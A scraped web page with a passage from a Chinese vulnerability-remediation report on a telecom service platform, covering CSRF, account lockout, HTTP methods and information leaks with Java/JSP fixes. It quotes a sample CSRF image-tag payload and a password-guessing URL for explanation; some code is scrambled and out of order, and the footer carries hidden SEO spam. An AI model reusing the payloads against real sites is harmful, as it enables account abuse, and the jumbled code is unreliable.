應(yīng)注意,由于項(xiàng)目的一些組件無法通過https,因此url-pattern字段只對(duì).jsp和.action進(jìn)行了限制,如果不做特定限制,則系統(tǒng)默認(rèn)是全部使用https傳輸。而且上述設(shè)置一旦在某個(gè)工程中出現(xiàn),那么當(dāng)前tomcat將全局采用這一配置??缯军c(diǎn)請(qǐng)求偽造 5.1 跨站點(diǎn)請(qǐng)求偽造概述</p><p>“跨站點(diǎn)偽造請(qǐng)求(CSRF)”攻擊可讓黑客以受害者的名義在易受攻擊的站點(diǎn)上運(yùn)行操作。當(dāng)易受攻擊的站點(diǎn)未適當(dāng)驗(yàn)證請(qǐng)求來源時(shí),便可能出現(xiàn)這個(gè)攻擊。這個(gè)漏洞的嚴(yán)重性取決于受影響的應(yīng)用程序的功能,例如,對(duì)搜索頁面的 CSRF 攻擊,嚴(yán)重性低于對(duì)轉(zhuǎn)帳頁面或概要更新頁面的 CSRF 攻擊。</p><p>這項(xiàng)攻擊的執(zhí)行方式,是強(qiáng)迫受害者的瀏覽器向易受攻擊的站點(diǎn)發(fā)出 HTTP 請(qǐng)求。如果用戶目前已登錄受害者站點(diǎn),請(qǐng)求會(huì)自動(dòng)使用用戶的憑證(如會(huì)話 Cookie、用戶的 IP 地址,以及其他瀏覽器認(rèn)證方法)。攻擊者利用這個(gè)方法來偽造受害者的身份,再代替他來提交操作。換句話來說,易受攻擊的站點(diǎn)未采取適當(dāng)措施來驗(yàn)證用戶實(shí)際是否想執(zhí)行特定操作。強(qiáng)迫受害者發(fā)送非預(yù)期的請(qǐng)求,方法有許多種:</p><p>-通過電子郵件向受害者發(fā)送易受攻擊應(yīng)用程序的惡意鏈接。在公共論壇中,張貼易受攻擊站點(diǎn)的鏈接。中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>-利用站點(diǎn)(或另一個(gè)站點(diǎn))的“跨站點(diǎn)腳本編制”或“鏈接注入”漏洞,將瀏覽器自動(dòng)重定向到易受攻擊的站點(diǎn)。</p><p>如果攻擊者利用易受攻擊的站點(diǎn)本身的“鏈接注入”漏洞,可以增加用戶通過站點(diǎn)認(rèn)證的可能性,進(jìn)而增加攻擊成功的可能性。</p><p>例如,攻擊者可以利用上述任何選項(xiàng)來誘惑受害者查看含有下列條目的頁面: <img src=”http://bank/transfer?destination=John&money=1000“ style='visibility:hidden'></p><p>這會(huì)使受害者的瀏覽器自動(dòng)請(qǐng)求 URL 及瀏覽器的當(dāng)前憑證。如果這個(gè)銀行業(yè)站點(diǎn)易受到 CSRF 攻擊,它會(huì)根據(jù)應(yīng)用程序邏輯,從受害者的帳戶中,將 1000 美元轉(zhuǎn)賬到 John 的銀行帳戶?!翱缯军c(diǎn)偽造請(qǐng)求”攻擊也稱為 CSRF(發(fā)音為 C-Serf)、XSRF、“跨站點(diǎn)偽造引用”、“單鍵攻擊”以及“會(huì)話騎乘”。您可以利用下列方式來驗(yàn)證您的應(yīng)用程序是否易受到 CSRF 攻擊: [1] 檢查易受攻擊的鏈接/請(qǐng)求是否未包括攻擊者難以猜中的參數(shù) [2] 檢查易受攻擊的鏈接/請(qǐng)求是否會(huì)執(zhí)行只應(yīng)自愿執(zhí)行的操作</p><p>含有用戶在不知不覺中提交的請(qǐng)求所能直接訪問的敏感操作的應(yīng)用程序,被視為很容易遭受 CSRF 攻擊。CSRF 也可能出現(xiàn)在登錄頁面和注銷頁面上。由于攻擊者可以偽造來自受害者的連續(xù)注銷請(qǐng)求,因此 CSRF 可能導(dǎo)致服務(wù)拒絕。在登錄頁面上,CSRF 可以允許攻擊者使用包含攻擊者用戶名和密碼的偽造請(qǐng)求來將客戶機(jī)登錄到攻擊者的賬戶中。登錄 CSRF 攻擊會(huì)帶有嚴(yán)重的后果,這取決于其他站點(diǎn)行為。例如,如果站點(diǎn)保留了用戶操作的歷史記錄(例如搜索歷史記錄),那么攻擊者將能夠在易受攻擊的站點(diǎn)上查看受害者之前執(zhí)行的操作。5.2 安全風(fēng)險(xiǎn)及原因分析</p><p>安全風(fēng)險(xiǎn)中,可能會(huì)竊取或操縱客戶會(huì)話和 cookie,它們可能用于模仿合法用戶,從而使黑客能夠以該用戶身份查看或變更用戶記錄以及執(zhí)行事務(wù) 原因:應(yīng)用程序使用的認(rèn)證方法不充分</p><p> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>5.3 AppScan掃描建議</p><p>如果要避免 CSRF 攻擊,每個(gè)請(qǐng)求都應(yīng)該包含唯一標(biāo)識(shí),它是攻擊者所無法猜測(cè)的參數(shù)。建議的選項(xiàng)之一是添加取自會(huì)話 cookie 的會(huì)話標(biāo)識(shí),使它成為一個(gè)參數(shù)。服務(wù)器必須檢查這個(gè)參數(shù)是否符合會(huì)話 cookie,若不符合,便廢棄請(qǐng)求。攻擊者無法猜測(cè)這個(gè)參數(shù)的原因是應(yīng)用于 cookie 的“同源策略”,因此,攻擊者無法偽造一個(gè)虛假的請(qǐng)求,讓服務(wù)器誤以為真。攻擊者難以猜測(cè)且無法訪問的任何秘密(也就是無法從其他域訪問),都可用來替換會(huì)話標(biāo)識(shí)。這可以防止攻擊者設(shè)計(jì)看似有效的請(qǐng)求。</p><p>5.4 應(yīng)用程序解決方案</p><p>已解密的登錄請(qǐng)求,要求就是數(shù)據(jù)要加密傳輸。最簡(jiǎn)單有效的解決方式采用SSL加密協(xié)議傳輸,但是由于EMA服務(wù)管理平臺(tái)業(yè)務(wù)的特殊性,采用SSL加密方式對(duì)現(xiàn)有的業(yè)務(wù)影響太大,所以最終沒有采用此種方式解決該問題,但個(gè)人在進(jìn)行測(cè)試過程中也嘗試在tomcat和jboss下SSL方式配置,寫下來供參考。6 不充分賬戶封鎖 6.1 不充分賬戶封鎖概述</p><p>蠻力攻擊是指惡意用戶發(fā)送大量可能的密碼和/或用戶名以訪問應(yīng)用程序的嘗試。由于該技術(shù)包含大量登錄嘗試,未限制允許的錯(cuò)誤登錄請(qǐng)求次數(shù)的應(yīng)用程序很容易遭到這類攻擊。因此,強(qiáng)烈建議您對(duì)帳戶限制允許的錯(cuò)誤登錄嘗試次數(shù),超過該次數(shù),便鎖定該帳戶。樣本利用: 下列請(qǐng)求說明密碼猜測(cè)請(qǐng)求:</p><p>http://site/login.asp?username=EXISTING_USERNAME&password=GUESSED_PASSWORD 如果站點(diǎn)在若干次錯(cuò)誤嘗試之后并不鎖定測(cè)試的帳戶,攻擊者最終可能會(huì)發(fā)現(xiàn)帳戶密碼,并使用它來假冒帳戶的合法用戶。6.2 安全風(fēng)險(xiǎn)及原因分析</p><p>安全風(fēng)險(xiǎn)高,可能會(huì)升級(jí)用戶特權(quán)并通過 Web 應(yīng)用程序獲取管理許可權(quán)</p><p>原因:Web 應(yīng)用程序編程或配置不安全</p><p> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>6.3 AppScan掃描建議</p><p>請(qǐng)確定允許的登錄嘗試次數(shù)(通常是 3-5 次),確保超出允許的嘗試次數(shù)之后,便鎖定帳戶。為了避免真正的用戶因帳戶被鎖定而致電支持人員的麻煩,可以僅臨時(shí)性暫掛帳戶活動(dòng),并在特定時(shí)間段之后啟用帳戶。帳戶鎖定大約 10 分鐘,通常便足以阻止蠻力攻擊。</p><p>6.4 應(yīng)用程序解決方案</p><p>根據(jù)掃描建議,web應(yīng)用程序設(shè)定允許登錄嘗試次數(shù),登錄連續(xù)失敗超過設(shè)定次數(shù),就鎖定用戶,失敗次數(shù)靈活配置。</p><p>在用戶登錄時(shí)進(jìn)行驗(yàn)證:</p><p>if(!encrypter.encrypt(userPassword).equalsIgnoreCase({</p><p>} //更新此用戶登錄失敗次數(shù)</p><p>this.updateLoginFailTimes(userCode);//如果用戶連續(xù)登錄失敗次數(shù)超過配置值則將其鎖定</p><p>int loginLockTimes=this.getLoginLockTimes();if(this.getLoginFailTimes(userCode)>=loginLockTimes){ } throw new MySecurityException(”密碼不正確!用戶:“ + userCode);this.lockUser(userCode);user.getLOGIN_PASSWD()== null ? ”“ : user.getLOGIN_PASSWD()))7 啟用不安全HTTP方法 7.1 啟用不安全HTTP方法概述</p><p>似乎 Web 服務(wù)器配置成允許下列其中一個(gè)(或多個(gè))HTTP 方法(動(dòng)詞):</p><p>-DELETE COPY PROPFIND LOCK-UNLOCK</p><p>這些方法可能表示在服務(wù)器上啟用了 WebDAV,可能允許未授權(quán)的用戶對(duì)其進(jìn)行利用。</p><p>7.2 安全風(fēng)險(xiǎn)及原因分析</p><p>安全風(fēng)險(xiǎn)中,可能會(huì)在 Web 服務(wù)器上上載、修改或刪除 Web 頁面、腳本和文件</p><p>原因:Web 服務(wù)器或應(yīng)用程序服務(wù)器是以不安全的方式配置的</p><p>7.3 AppScan掃描建議</p><p>如果服務(wù)器不需要支持 WebDAV,請(qǐng)務(wù)必禁用它,或禁止不必要的 HTTP 方法(動(dòng)詞)。</p><p>7.4 應(yīng)用程序解決方案</p><p>修改web工程中web.xml,增加安全配置信息,禁用不必要HTTP方法</p><p><security-constraint></p><p><web-resource-collection></p><p><web-resource-name>HtmlAdaptor</web-resource-name> <description>test</description> <url-pattern>*.jsp</url-pattern> <url-pattern>*.do</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> <http-method>HEAD</http-method> <http-method>OPTIONS</http-method> <http-method>TRACE</http-method></p><p>中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p></web-resource-collection><!--</p><p><auth-constraint></p><p></auth-constraint></p><p>--></security-constraint>。<role-name>JBossAdmin</role-name> HTTP注釋敏感信息 8.1 HTTP注釋敏感信息概述</p><p>很多 Web 應(yīng)用程序程序員使用 HTML 注釋,以在需要時(shí)幫助調(diào)試應(yīng)用程序。盡管添加常規(guī)注釋有助于調(diào)試應(yīng)用程序,但一些程序員往往會(huì)遺留重要數(shù)據(jù)(例如:與 Web 應(yīng)用程序相關(guān)的文件名、舊的鏈接或原非供用戶瀏覽的鏈接、舊的代碼片段等)。8.2 安全風(fēng)險(xiǎn)及原因分析</p><p>安全風(fēng)險(xiǎn)低,能會(huì)收集有關(guān) Web 應(yīng)用程序的敏感信息,如用戶名、密碼、機(jī)器名和/或敏感文件位置</p><p>原因:程序員在 Web 頁面上留下調(diào)試信息</p><p>8.3 AppScan掃描建議</p><p>[1] 請(qǐng)勿在 HTML 注釋中遺留任何重要信息(如文件名或文件路徑)。</p><p>[2] 從生產(chǎn)站點(diǎn)注釋中除去以前(或未來)站點(diǎn)鏈接的跟蹤信息。</p><p>[3] 避免在 HTML 注釋中放置敏感信息。</p><p>[4] 確保 HTML 注釋不包括源代碼片段。</p><p>[5] 確保程序員沒有遺留重要信息。</p><p> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>8.4 應(yīng)用程序解決方案</p><p>雖然這個(gè)漏洞為低級(jí)別漏洞,但電信方也是要求必須修復(fù),要修改此漏洞需要檢查工程中的每一個(gè)jsp頁面,工作量還是挺大。所以在后續(xù)開發(fā)過程中注釋盡量寫英文注釋,盡量不要遺留敏感注釋信息在jsp代碼中,養(yǎng)成良好的編碼習(xí)慣才是解決問題根本。發(fā)現(xiàn)電子郵件地址模式</p><p>9.1 發(fā)現(xiàn)電子郵件地址模式概述</p><p>Spambot 搜尋因特網(wǎng)站點(diǎn),開始查找電子郵件地址來構(gòu)建發(fā)送自發(fā)電子郵件(垃圾郵件)的郵件列表。AppScan 檢測(cè)到含有一或多個(gè)電子郵件地址的響應(yīng),可供利用以發(fā)送垃圾郵件。而且,找到的電子郵件地址也可能是專用電子郵件地址,對(duì)于一般大眾應(yīng)是不可訪問的。9.2 安全風(fēng)險(xiǎn)及原因分析</p><p>安全風(fēng)險(xiǎn)低,能會(huì)收集有關(guān) Web 應(yīng)用程序的敏感信息,如用戶名、密碼、機(jī)器名和/或敏感文件位置</p><p>原因:Web 應(yīng)用程序編程或配置不安全</p><p>9.3 AppScan掃描建議</p><p>從 Web 站點(diǎn)中除去任何電子郵件地址,使惡意的用戶無從利用。</p><p>9.4 應(yīng)用程序解決方案</p><p>根據(jù)掃描建議刪除注釋中出現(xiàn)email地址信息,如果頁面中要顯示mail地址轉(zhuǎn)為圖片形式展示。如:ema服務(wù)管理平臺(tái)首頁需要展示客戶聯(lián)系方式,并且聯(lián)系方式、email等信息,這些信息用戶都是可以自行修改的,因?yàn)榘薳mail地址,所以聯(lián)系方式就轉(zhuǎn)為圖片形式:</p><p><%@ page language=”java“ contentType=”text/html;charset=gb2312“%> <%@ include file=”/common/taglib.jsp“ %> <%@ include file=”/common/chart.jsp“ %> <%@ page import=”java.util.List,java.util.*,java.awt.*,java.awt.image.*,com.su 17 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>n.image.codec.jpeg.*,java.util.*“ %> <%@ page import=”com.sitech.ismp.informationService.publish.dao.TB_SYS_SUPPORT_STAFFDao“ %> <html:html locale=”true“> <head> <%@ include file=”/common/link.jsp“ %> <%@ page import=”com.sitech.ismp.util.context.CommUtil“ %> </head> <link href=”/css/style.css“ rel=”stylesheet“ type=”text/css“> <link rel=”stylesheet“ type=”text/css“ media=”all“ href=”/css/calendar-win2k-cold-1.css“ title=”win2k-cold-1“ /> <body> <html:form action=”/homeContactShow“ method=”post“ styleId=”theForm“> <bean:define id=”theForm“ name=”supportStaffForm“/> <div id="enp7my0" class=bg id=left> <div> <table width=”100%“ border=”0“ cellpadding=”0“ cellspacing=”0“ class=”tablebg“> <TBODY> <tr> <td class=”tableheadbg“>運(yùn)營(yíng)中心聯(lián)系方式</td> </tr> <tr> <td class=”tablewhitebg“></p><p><%</p><p>List typeList =(List)request.getAttribute(”typeList“);out.clear();out = pageContext.pushBody();response.addHeader(”pragma“,”NO-cache“);response.addHeader(”Cache-Control“,”no-cache“);response.addDateHeader(”Expries“,0);int rowheight=20;</p><p>int width=135,height=rowheight*typeList.size();String ty= ”“;String mob=”“;for(int i=0;i<typeList.size();i++){</p><p>HashMap hm=(HashMap)typeList.get(i);ty=(String)hm.get(”TYPE_ID“);List sta =(List)dao.findSupportStaffByTypeId(ty);for(int k=0;k<sta.size();k++){</p><p>TB_SYS_SUPPORT_STAFFDao dao= new TB_SYS_SUPPORT_STAFFDao();response.setContentType(”image/jpeg“);</p><p> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>HashMap map =(HashMap)sta.get(k);</p><p>mob =(String)map.get(”MOBILE“);</p><p>height+=3*rowheight;</p><p>if(mob!=null)height+=rowheight;</p><p>}</p><p>}</p><p>BufferedImage image = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);Graphics g = image.getGraphics();g.setColor(Color.white);g.fillRect(0, 0, width, height);g.setColor(Color.BLUE);Font font=new Font(”宋體“,Font.PLAIN,13);g.setFont(font);int row=0;</p><p>String typeid = ”“;</p><p>String typename=”“;</p><p>String name = ”“;</p><p>String tel=”“;</p><p>String mail = ”“;</p><p>String mobile=”“;</p><p>for(int i=0;i<typeList.size();i++){</p><p>HashMap hm=(HashMap)typeList.get(i);</p><p>typeid=(String)hm.get(”TYPE_ID“);</p><p>typename=(String)hm.get(”TYPE_NAME“);</p><p>row++;</p><p>g.drawString(typename,0,(row-1)*rowheight+10);</p><p>List staffs =(List)dao.findSupportStaffByTypeId(typeid);</p><p>for(int k=0;k<staffs.size();k++){</p><p>HashMap map =(HashMap)staffs.get(k);</p><p>name =(String)map.get(”NAME“);</p><p>tel =(String)map.get(”TEL“);</p><p>mail =(String)map.get(”MAIL“);</p><p>mobile =(String)map.get(”MOBILE“);</p><p>row++;</p><p>g.drawString(name+”:"+tel,0,(row-1)*rowheight+10);</p><p>row++;</p><p>g.drawString(mail,0,(row-1)*rowheight+10);</p><p>if(mobile!=null){</p><p>row++;</p><p>g.drawString(mail,0,(row-1)*rowheight+10);} 19 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)</p><p>} } g.dispose();ServletOutputStream outStream = response.getOutputStream();</p><p>JPEGImageEncoder encoder encoder.encode(image);outStream.close();=JPEGCodec.createJPEGEncoder(outStream);%> </td> </tr></p><p></TBODY> </table> </div> </article> <a href="#" tpid="25" target="_self" class="download_card jhcdown" rel="nofollow"> <img class="download_card_pic" src="http://static.xiexiebang.com/skin/default/images/icon_word.png" alt="下載Fckeditor漏洞利用總結(jié)(五篇范文)word格式文檔"> <div id="1el1hmw" class="download_card_msg"> <div id="p5mzdsb" class="download_card_title" style="text-decoration:none;">下載Fckeditor漏洞利用總結(jié)(五篇范文).doc</div> <div id="8hrv0jp" class="download_card_tip">將本文檔下載到自己電腦,方便修改和收藏,請(qǐng)勿使用迅雷等下載。</div> </div> <div id="qlu1j0z" class="download_card_btn"> <img src="http://static.xiexiebang.com/skin/default/images/icon_download.png"> <div id="vjk52ij" class="downlod_btn_right"> <div>點(diǎn)此處下載文檔</div> <p>文檔為doc格式</p> </div> </div> </a> <div id="ejwhllx" class="post-tags mt20 mb30"><span>相關(guān)專題</span> <a href="/tag/jxgzzjczwt/" target="_blank">教學(xué)工作總結(jié)存在問題</a> <a href="/tag/xzgzzjczwt/" target="_blank">鄉(xiāng)鎮(zhèn)工作總結(jié)存在問題</a> <a href="/tag/grzjdwthbz/" target="_blank">個(gè)人總結(jié)的問題和不足</a> </div> <div id="ewcktym" class="single-info mb40"><span id="ixrqqmi" class="hidden-xs ">網(wǎng)址:http://004km.cn/a9/2019051321/6cad02c80bc5543e.html</span><br>聲明:本文內(nèi)容由互聯(lián)網(wǎng)用戶自發(fā)貢獻(xiàn)自行上傳,本網(wǎng)站不擁有所有權(quán),未作人工編輯處理,也不承擔(dān)相關(guān)法律責(zé)任。如果您發(fā)現(xiàn)有涉嫌版權(quán)的內(nèi)容,歡迎發(fā)送郵件至:645879355@qq.com 進(jìn)行舉報(bào),并提供相關(guān)證據(jù),工作人員會(huì)在5個(gè)工作日內(nèi)聯(lián)系你,一經(jīng)查實(shí),本站將立刻刪除涉嫌侵權(quán)內(nèi)容。 </div> <div id="rqtkswi" class="single-xg mb40"> <div id="lflgqns" class="con-title"> <h3><a name="6"></a>相關(guān)范文推薦</h3> </div> <div id="rg7g0to" class="sticky mb20"> <ul><h2 class="mb20"><a href="/a14/201905152/f0dcc59e96450502.html" target="_blank">工作上的漏洞</a></h2><p>一、工作上的漏洞 (一) 具體體現(xiàn): 1、 學(xué)習(xí)不夠,沒有把科學(xué)發(fā)展觀理論與學(xué)校教育教學(xué)緊密結(jié)合。在運(yùn)用科學(xué)發(fā)展理論來指導(dǎo)教育教學(xué)時(shí),眼光過度關(guān)注學(xué)校發(fā)展,忽視了科學(xué)發(fā)展理論對(duì)......</p><h2 class="mb20"><a href="/a14/2019051422/575531ef31580d8a.html" target="_blank">漏洞排查情況報(bào)告(★)</a></h2><p>縣農(nóng)村信用合作聯(lián)社科技信息部 內(nèi)部控制缺陷和漏洞梳理排查情況進(jìn)展報(bào)告 風(fēng)險(xiǎn)合規(guī)部: 《關(guān)于印發(fā)縣農(nóng)村信用合作聯(lián)社內(nèi)部控制缺陷和漏洞梳理排查工作實(shí)施細(xì)則的通知》(農(nóng)信發(fā)﹝2......</p><h2 class="mb20"><a href="/a8/2019051317/52ca3748c7b31c41.html" target="_blank">內(nèi)控漏洞案例</a></h2><p>不相容職務(wù)不分離案例案例一 2004年10月19號(hào),北京市中級(jí)人民法院開庭審理原國(guó)家自然科學(xué)基金委員會(huì)資金管理處會(huì)計(jì)卞中涉嫌貪污挪用公款2.2億元的巨額資金一案,卞中被判死緩。......</p><h2 class="mb20"><a href="/a8/2019051513/a8e83a22d7bdee5c.html" target="_blank">資源利用總結(jié)</a></h2><p>資源綜合利用情況總結(jié)我公司自2012年3月通過資源綜合利用企業(yè)再認(rèn)定以來,緊緊抓住城市綜合建設(shè)、小城鎮(zhèn)新規(guī)劃快速發(fā)展對(duì)水泥需求較大有利機(jī)遇,把資源綜合利用工作作為生產(chǎn)經(jīng)......</p><h2 class="mb20"><a href="/a2/2019051218/a0c34487cbeee142.html" target="_blank">開展“查管理,堵漏洞”活動(dòng)總結(jié)</a></h2><p>開展“查管理,堵漏洞”活動(dòng)總結(jié) 4月10日,我們收聽了國(guó)家電力公司關(guān)于開展“求真務(wù)實(shí)、作風(fēng)建設(shè)年”活動(dòng)的電視電話會(huì)議,這個(gè)會(huì)議體現(xiàn)了國(guó)電公司領(lǐng)導(dǎo)對(duì)作風(fēng)建設(shè)的高度重視。會(huì)后......</p><h2 class="mb20"><a href="/fanwen/zhenggai/7e2d39bdb8a54343.html" target="_blank">網(wǎng)站漏洞整改報(bào)告</a></h2><p>網(wǎng)站安全整改報(bào)告 收到教育局中心機(jī)房發(fā)來的網(wǎng)站安全漏洞檢測(cè)報(bào)告,對(duì)被檢測(cè)的域名地址進(jìn)行確認(rèn),我校主要近階段處在新舊網(wǎng)站交替時(shí)期,舊網(wǎng)站還沒有退役,新網(wǎng)站也已上線。被檢測(cè)......</p><h2 class="mb20"><a href="/a11/2019051416/289551f9623cb0dc.html" target="_blank">漏洞整改報(bào)告IDC-ISP</a></h2><p>漏洞整改報(bào)告 1. 漏洞信息 Apache Struts2遠(yuǎn)程命令執(zhí)行漏洞,可以遠(yuǎn)程執(zhí)行命令,獲取敏感信息。 2. 漏洞原因分析 Apache Struts2 版本較低, 不是最新版本; 3. 漏洞處理過程 升......</p><h2 class="mb20"><a href="/a11/2019051416/eb923171beb3db53.html" target="_blank">超市收銀漏洞如何監(jiān)管</a></h2><p>超市收銀漏洞如何監(jiān)管 收銀漏洞說白了就是收銀員有這樣那樣的損公肥私(包括家人)行為,將本不屬于自己的錢據(jù)為己有,超市方卻又無法做到真正的控制。收銀漏洞這樣的行為放任下去,......</p></ul> </div> </div> </div> </div> <div id="0fqiz3f" class="right-content-box wow fadeInRight delay300 right-content"> <div id="brf5bn0" class="sidebar"> <div class="ujbn2ls" id="sidebar" role="complementary"> <aside id="recent-posts-3" class="widget widget_recent_entries"> <h3 class="widget-title">猜你喜歡</h3> <ul class="new-list"><li><a href="/a13/2019051423/51eb67686e65520c.html" title="信訪制度的漏洞" target="_blank">信訪制度的漏洞</a></li><li><a href="/a10/2019051322/9a5064d3f3f3a5df.html" title="杭州酒店財(cái)務(wù)管理漏洞" target="_blank">杭州酒店財(cái)務(wù)管理漏洞</a></li><li><a href="/a14/201905151/821a6ff447138ee9.html" title="如何改進(jìn)現(xiàn)行財(cái)務(wù)漏洞" target="_blank">如何改進(jìn)現(xiàn)行財(cái)務(wù)漏洞</a></li><li><a href="/a5/2019051315/2540cd0fb8be8c69.html" title="網(wǎng)站漏洞整改報(bào)告" target="_blank">網(wǎng)站漏洞整改報(bào)告</a></li><li><a href="/a6/2019051318/5bf3b546d4c13593.html" title="生物資源與利用總結(jié)范文大全" target="_blank">生物資源與利用總結(jié)范文大全</a></li><li><a href="/fanwen/zhenggai/eb6d9f1bbb8b541f.html" title="網(wǎng)站漏洞整改報(bào)告(五篇材料)" target="_blank">網(wǎng)站漏洞整改報(bào)告(五篇材料)</a></li><li><a href="/a14/2019051422/f0bd0b8154ae6297.html" title="監(jiān)外執(zhí)行:須多方堵塞“漏洞”(范文模版)" target="_blank">監(jiān)外執(zhí)行:須多方堵塞“漏洞”(范文模版)</a></li><li><a href="/a3/2019051221/ca7eacad6c2f655c.html" title="制度漏洞評(píng)估分析報(bào)告" target="_blank">制度漏洞評(píng)估分析報(bào)告</a></li><li><a href="/a3/2019051222/8b5866495950d76d.html" title="勞動(dòng)合同法19個(gè)漏洞和缺陷" target="_blank">勞動(dòng)合同法19個(gè)漏洞和缺陷</a></li><li><a href="/a10/2019051416/f5037862421d735e.html" title="餐飲管理軟件怎么防止收銀漏洞(合集)" target="_blank">餐飲管理軟件怎么防止收銀漏洞(合集)</a></li></ul> </aside> </div> </div> </div> </div> </div> </section> <section id="footer" class="p30"> <div id="lihrx7g" class="container"> <div id="efraibl" class="footer-top clearfix"> <div id="pgklldu" class="copyr"> <div id="2vj5xkt" class="footer-menu clearfix mb10"> <ul class="footer-menu-con"> <li><a href="/a1/">1號(hào)文庫</a></li><li><a href="/a2/">2號(hào)文庫</a></li><li><a href="/a3/">3號(hào)文庫</a></li><li><a href="/a4/">4號(hào)文庫</a></li><li><a href="/a5/">5號(hào)文庫</a></li><li><a href="/a6/">6號(hào)文庫</a></li><li><a href="/a7/">7號(hào)文庫</a></li><li><a href="/a8/">8號(hào)文庫</a></li><li><a href="/a9/">9號(hào)文庫</a></li><li><a href="/a10/">10號(hào)文庫</a></li><li><a href="/a11/">11號(hào)文庫</a></li><li><a href="/a12/">12號(hào)文庫</a></li><li><a href="/a13/">13號(hào)文庫</a></li><li><a href="/a14/">14號(hào)文庫</a></li><li><a href="/a15/">15號(hào)文庫</a></li> </ul> </div> <p>Copyright ? 2018 <a href="/">寫寫幫文庫</a> All Rights Reserved   <a target="_blank" href="http://www.beian.miit.gov.cn" rel="nofollow"> 浙ICP備11058632號(hào)</a>   </p> </div> </div> </div> </section> <div id="kxwh6vl" class="right_bar hidden-xs "> <ul> <li id="ynkvc5b" class="rtbar_li1" style="left: 0px;"><a><img src="http://static.xiexiebang.com/skin/default/images/rtbar_liicon3.png"><span id="call_tel"></span></a></li> <li id="rf1ksw4" class="rtbar_li2"> <a href="javascript:void(0);"> <img src="http://static.xiexiebang.com/skin/default/images/rtbar_liicon4.png"> </a> <div id="cmtx1tc" class="rtbar_shwx" style="display: none;"> <img width="188" height="188" alt="微信二維碼" src="http://static.xiexiebang.com/skin/default/images/wechat.png"> </div> </li> <li id="hf7vte3" class="rtbar_li3" style="left: 0px;"> <a href="tencent://message/?uin=2261362615&Menu=yes"> <img src="http://static.xiexiebang.com/skin/default/images/rtbar_liicon2.png"> 點(diǎn)擊咨詢 </a> </li> <li id="o8rrx2l" class="rtbar_li5"><a href="#1">第一篇</a></li> <li id="zinxl8p" class="rtbar_li6"><a href="#2">第二篇</a></li> <li id="fwyjlx7" class="rtbar_li7"><a href="#3">第三篇</a></li> <li id="xwybl83" class="rtbar_li8"><a href="#4">第四篇</a></li> <li id="tmp4av1" class="rtbar_li9"><a href="#5">第五篇</a></li> <li id="35mhjcg" class="rtbar_li10"><a href="#6">更 多</a></li> <li id="ewxrq9o" class="rtbar_li4 gotop"> <a href=""><img src="http://static.xiexiebang.com/skin/default/images/rtbar_liicon1.png"> </a></li> </ul> </div> <footer> <div class="friendship-link"> <a href="http://004km.cn/" title="欧美色欧美亚洲高清在线观看,国产特黄特色a级在线视频,国产一区视频一区欧美,亚洲成a 人在线观看中文">欧美色欧美亚洲高清在线观看,国产特黄特色a级在线视频,国产一区视频一区欧美,亚洲成a 人在线观看中文</a> <div style="position:fixed;left:-9000px;top:-9000px;"><abbr id="fwlom"><wbr id="fwlom"></wbr></abbr><nav id="fwlom"><thead id="fwlom"></thead></nav><ul id="fwlom"></ul><blockquote id="fwlom"></blockquote><address id="fwlom"><wbr id="fwlom"><ruby id="fwlom"><pre id="fwlom"></pre></ruby></wbr></address><ul id="fwlom"></ul><center id="fwlom"><dl id="fwlom"><optgroup id="fwlom"></optgroup></dl></center><ins id="fwlom"></ins><optgroup id="fwlom"><sub id="fwlom"></sub></optgroup><abbr id="fwlom"></abbr><sup id="fwlom"></sup><pre id="fwlom"></pre><table id="fwlom"></table><pre id="fwlom"><delect id="fwlom"></delect></pre><strong id="fwlom"><tr id="fwlom"><address id="fwlom"></address></tr></strong><wbr id="fwlom"><abbr id="fwlom"><sub id="fwlom"><strong id="fwlom"></strong></sub></abbr></wbr><strong id="fwlom"></strong><acronym id="fwlom"><th id="fwlom"><track id="fwlom"></track></th></acronym><dfn id="fwlom"></dfn><optgroup id="fwlom"><xmp id="fwlom"></xmp></optgroup><font id="fwlom"></font><thead id="fwlom"><ol id="fwlom"></ol></thead><i id="fwlom"></i><output id="fwlom"><fieldset id="fwlom"></fieldset></output><mark id="fwlom"></mark><label id="fwlom"><samp id="fwlom"></samp></label><cite id="fwlom"></cite><output id="fwlom"><th id="fwlom"></th></output><optgroup id="fwlom"></optgroup><menuitem id="fwlom"><cite id="fwlom"><big id="fwlom"></big></cite></menuitem><label id="fwlom"></label><code id="fwlom"><ins id="fwlom"><p id="fwlom"><blockquote id="fwlom"></blockquote></p></ins></code><thead id="fwlom"></thead><big id="fwlom"><tbody id="fwlom"></tbody></big><dl id="fwlom"></dl><li id="fwlom"><big id="fwlom"><style id="fwlom"></style></big></li><xmp id="fwlom"><ul id="fwlom"></ul></xmp><optgroup id="fwlom"></optgroup><strike id="fwlom"><progress id="fwlom"><pre id="fwlom"></pre></progress></strike><dfn id="fwlom"><cite id="fwlom"><kbd id="fwlom"></kbd></cite></dfn><pre id="fwlom"></pre><strong id="fwlom"><acronym id="fwlom"><th id="fwlom"></th></acronym></strong><mark id="fwlom"></mark><label id="fwlom"><video id="fwlom"></video></label><pre id="fwlom"><strong id="fwlom"><xmp id="fwlom"></xmp></strong></pre><center id="fwlom"></center><input id="fwlom"><wbr id="fwlom"></wbr></input><p id="fwlom"><abbr id="fwlom"><style id="fwlom"></style></abbr></p><menuitem id="fwlom"></menuitem><blockquote id="fwlom"><input id="fwlom"><form id="fwlom"></form></input></blockquote> <big id="fwlom"><kbd id="fwlom"></kbd></big><optgroup 